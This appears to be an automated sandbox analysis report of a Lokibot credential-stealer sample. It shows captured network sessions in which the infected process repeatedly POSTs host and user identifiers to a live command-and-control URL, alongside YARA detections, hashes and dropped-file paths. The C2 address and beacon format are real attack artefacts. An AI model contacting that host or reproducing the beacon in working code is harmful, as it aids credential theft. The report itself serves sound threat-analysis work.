Feb 20, 2025 15:08:21.479804993 CET	824	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:08:21 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z41I8UlT7QfpQ%2B4zJc%2BrA02KH%2Bkxoi2Uu8jQ9eZu4Z1SCu1jgjl0AiPYx4FFYsAWcBgdGiwSqjXJFTR0KpMmxX5sy2ZBuJvebsn%2BfqgA%2FbSuQGRVZUiSy430GEA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f1173ee1f18c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1573&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	50044	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:22.682341099 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:22.688183069 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:23.425607920 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:08:23 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1T7BNZOp369%2BEI1GWdUrZm9PTxbt4XBHQlXxsWDs5JotI2wFxHnOpi2K6B7ApYkIjUj3L0yAOa%2BLyBEwpP%2BrIZDrtsSG4jwYBqxrXVVRacFN1AruOCPfDkn3yBA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f11805c178c71-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1940&min_rtt=1940&rtt_var=970&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	50045	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:24.580570936 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:24.585638046 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:25.335839033 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:08:25 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iZgdukKTICVP9BQgIgi02zYx9VQh%2BCLKrG59EOeiugNTCJktX1yuMucf7zQ7f6wycbLSl9g30WAn3qIk0D2iEbCXGM5Vv0Zm864n7mFYFrSRsLVcZdLhOC7ssOg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f118c4be84322-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1656&rtt_var=828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	50046	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:26.521337986 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:26.526443958 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:27.274243116 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:08:27 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZoXlwJMyzr15RD4wXuNsrwMpv1aNZr%2B2hEJy%2BBEbeLlHXXOPStThOH12yEYOpy%2FKdqvlWleO4Ofj0%2Buzz2vGBQtYBY7gZY1ALqpS7IYGRYo43sZTilaGX6JJgac%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f1198596a727a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	50047	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:28.432694912 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:28.437803030 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:29.244296074 CET	843	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:08:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tfb22Y14ko2Fo%2BEeTm38iznsUbmLOyWW0Nn6IGAgls5AhjBckCnxIn6CXclQMkYPWyXebUaWXMINY73%2BvisNUOUVAVlRU7U7Tjw31OGKFd%2BzjVbwOYirAlmRXWk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f11a449627d0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2026&rtt_var=1013&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	50048	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:30.441991091 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:30.447082996 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:31.240986109 CET	841	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:08:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sJ2k5JRKXYcWF5s0SChbLgr63NE7sPcbcySGJzdgllDQSrVMoHSVTcFRO8q3AacC3Y%2BjDeAlGKm2OY7uNcKhADLAwCp%2BJeQksYZT9hZtP1tkVpqTkNZcprAWQfs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f11b0be5e6a56-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2172&min_rtt=2172&rtt_var=1086&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	50049	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:08:32.410484076 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:08:32.416537046 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:08:33.259747028 CET	848	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:08:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zp1IIJYO5VmYSbsPRlCo2wam%2Bv%2F3E3A1fUOJYr3Q9YSGrJ8xwhsFdxPVGL5%2BhGmViHNTJadsQiNWPuQkvLAX9Z8ow4ERRV%2FZFQWReSGc7AaOs%2FwaFDp%2BuZayiwA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f11bd2b58728a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1966&rtt_var=983&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	09:06:26
Start date:	20/02/2025
Path:	C:\Users\user\Desktop\dfiCWCanbj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dfiCWCanbj.exe"
Imagebase:	0xb30000
File size:	956'928 bytes
MD5 hash:	62ABC4447D8B6877CAB7A721E0331450
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:06:27
Start date:	20/02/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dfiCWCanbj.exe"
Imagebase:	0x330000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.3383851438.0000000003421000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dfiCWCanbj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\adstipulator

C:\Users\user\AppData\Local\Temp\aut4D08.tmp

C:\Users\user\AppData\Local\Temp\aut4D67.tmp

C:\Users\user\AppData\Local\Temp\troopwise

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
dfiCWCanbj.exe